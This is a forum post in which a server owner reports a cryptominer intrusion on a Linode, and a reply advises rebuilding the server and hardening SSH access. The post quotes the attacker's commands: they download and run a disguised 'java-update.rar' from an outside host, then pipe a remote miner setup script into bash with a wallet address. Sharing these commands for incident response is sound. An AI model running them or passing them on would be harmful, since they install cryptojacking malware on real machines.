Bitcoin miner hack
I have a Linode protected by ufw and fail2ban, but someone managed to hack it, get in as non-sudo user, and install a bitcoin miner xmrig. A couple of scripts were executed (see below), one that has me worried is "java-update.rar". The only info I could find on this stuff is on Threatbook in Chinese: https://bit.ly/3dMcicX
Does anyone have any advice on this? I'm inclined to rebuild the server.
Executed script:
cd /tmp
curl -OL http://tiktok.wenkaisb.info/java-update.rar;chmod 777 java-update.rar;./java-update.rar
curl -s -L http://tiktok.wenkaisb.info/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 853P6jv8Npp5nV1as3w9Td7Kaoy9CBtS12Cz2ive7KjMHCijrpwMipQDom1GSPej1UQ38TYbesnDafieGZv76JrGGVAVsAr
1 Reply
Hi,
You should rebuild your server and start over, take a look at this guide that explains how to deal with such a situation.
I would also recommend that you only allow logins authenticated by SSH keys, password protected ones. You could even take that a step further and set up something simple like a Wireguard VPN that only you can access, logging in to your Linode from only that IP address, and disabling public SSH access.
If you run any website software that has any type of control panel or API, something like that could allow remote code execution, so check any CMS or otherwise that you may be running for any vulnerabilities, and upgrade it or use another content management system.
There are a lot of tips on securing your Linode that could be useful to you. Hopefully those will help as well.
Good luck!
Blake